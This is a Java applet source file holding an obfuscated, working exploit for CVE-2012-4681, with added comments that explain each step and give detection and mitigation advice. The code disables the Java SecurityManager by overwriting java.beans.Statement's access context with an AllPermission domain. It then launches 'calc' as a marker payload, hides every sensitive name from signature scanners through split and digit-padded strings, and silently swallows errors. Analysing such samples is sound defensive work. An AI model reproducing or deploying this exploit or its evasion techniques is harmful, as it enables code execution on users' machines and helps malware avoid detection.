- /*
- * Java 7 Exploit CVE-2012-4681 obfuscation pt. 5/5
- *
- * Affected product versions:
- * - JDK and JRE 7 Update 6 and before
- *
- * Post link: http://security-obscurity.blogspot.com/2012/11/java-exploit-code-obfuscation-and.html
- */
- import java.applet.Applet;
- import java.awt.Graphics;
- import java.beans.Expression;
- import java.beans.Statement;
- import java.lang.reflect.Field;
- import java.net.URL;
- import java.security.*;
- import java.security.cert.Certificate;
- import java.lang.reflect.Constructor;
- import java.lang.reflect.Method;
- public class Java extends Applet // Analysis sample for CVE-2012-4681 (see file header): init() removes the JVM SecurityManager through java.beans reflection and then starts "calc". Every sensitive name below is split or digit-padded, so literal string signatures miss it; detection should match decoded constants or behaviour (an applet combining java.beans.Expression/Statement, a sun.* class lookup and a hand-built AccessControlContext). Mitigation is a Java runtime newer than the affected versions listed in the header.
- {
- // Digit-padded method name: replaceAll("\\d","") in enableSecurity() reduces it to "setSecurityManager".
- String secMan = "22s234e34523454tS345e334545c345u5356r67i6t6y4354834M90a6n4a4g345e34r34";
- // Character codes spelling the URL string "file:///"; used as the CodeSource location in enableSecurity().
- char file[] = {(char)102,(char)105,(char)108,(char)101,(char)58,(char)47,(char)47,(char)47};
- // Four fragments that GimmeClass() joins as aw+ad+kl+me, giving "forName".
- String ad = "or",me = "me", aw = "f", kl = "Na";
- // Digit-padded method name: with the digits stripped it reads "getField".
- String field = "789g8795e456"+"5t5765F5675"+"567i6765e756"+"567l567d567";
- // Fragments joined as s+dot+u+dot+n to form the class name "sun.awt.SunToolkit".
- String s = "sun", u = "awt", n = "SunToolkit", dot = ".";
- public void enableSecurity() throws Throwable // Misleading name: this DISABLES security. It runs System.setSecurityManager(null) via a java.beans.Statement whose access-control context is replaced with one that holds AllPermission. Any reflection failure propagates as Throwable.
- {
- Object ao[] = new Object[2]; // argument list for the reflective getField call
- ao[0] = GimmeClass("java.beans.Statement"); // class whose field is being requested
- ao[1] = "a"+"c"+"c"; // field name "acc", split so the literal never appears whole
- Expression e = new Expression(GimmeClass(new String(s+dot+u+dot+n)), field.replaceAll("\\d",""), ao); // describes the call sun.awt.SunToolkit.getField(Statement.class, "acc"); 'field' here is still the String member, the local Field below is not yet in scope
- e.execute();
- Field field = (Field)e.getValue(); // reflective handle on Statement's "acc" field; shadows the String member from here on. NOTE(review): presumably returned already accessible, since set() below is used without setAccessible -- confirm
- Class alPerm = Class.forName("jav"+"a."+"sec"+"u"+"rit"+"y.A"+"ll"+"Perm"+"iss"+"ion"); // java.security.AllPermission (the one lookup made with a direct Class.forName)
- Class perm = GimmeClass("java.se"+"curi"+"ty.P"+"ermi"+"ssi"+"ons"); // java.security.Permissions
- Object pe= perm.newInstance(); // empty permission collection
- Method method = pe.getClass().getMethod("ad"+"d", GimmeClass("java."+"secu"+"rity"+".Per"+"mis"+"sion")); // Permissions.add(java.security.Permission)
- method.invoke(pe, alPerm.newInstance()); // the collection now grants AllPermission
- CodeSource cs = new CodeSource( new URL(new String(file)), new Certificate[0]); // code source at "file:///" with no signer certificates
- ProtectionDomain pd = new ProtectionDomain(cs, (Permissions)pe); // domain pairing that code source with the all-permission collection
- AccessControlContext ac = new AccessControlContext(new ProtectionDomain[] { pd }); // context made of that single fully privileged domain
- Class statClass = GimmeClass("ja"+"va."+"be"+"ans"+".S"+"tat"+"em"+"ent"); // java.beans.Statement, looked up again under a differently split name
- Constructor con = statClass.getConstructor(new Class[]{ Object.class, String.class, Object[].class}); // Statement(Object target, String methodName, Object[] arguments)
- Object stat = con.newInstance(GimmeClass("java.lan"+"g.S"+"ys"+"tem"),secMan.replaceAll("\\d",""), new Object[1]); // Statement for System.setSecurityManager(<null>): new Object[1] holds one null element
- field.set(stat, ac); // overwrite the statement's stored context with the fabricated privileged one
- Method m = stat.getClass().getMethod("ex"+"ecu"+"te"); // Statement.execute(), resolved by a split name
- m.invoke(stat); // performs the setSecurityManager(null) call described above
- }
- public void init() // Applet entry point (overrides Applet.init): runs the bypass, then the marker payload.
- {
- try
- {
- enableSecurity();
- Runtime.getRuntime().exec("calc"); // starts the "calc" program as the visible marker payload; a process launch from an applet is a strong behavioural indicator
- }
- catch(Throwable t){} // swallows every Throwable, so a failed attempt leaves no visible error or log entry
- }
- private Class GimmeClass(String ps) throws Throwable // Returns the Class named ps; same result as Class.forName(ps), but dispatched through java.beans.Expression with the method name assembled from fragments, so the lookup is never written as a direct Class.forName(...) call.
- {
- Expression le = new Expression(Class.class, aw+ad+kl+me, new Object[] {ps}); // describes Class.forName(ps); aw+ad+kl+me is "forName"
- le.execute();
- return (Class)le.getValue(); // result of the forName call, cast from Object
- }
- }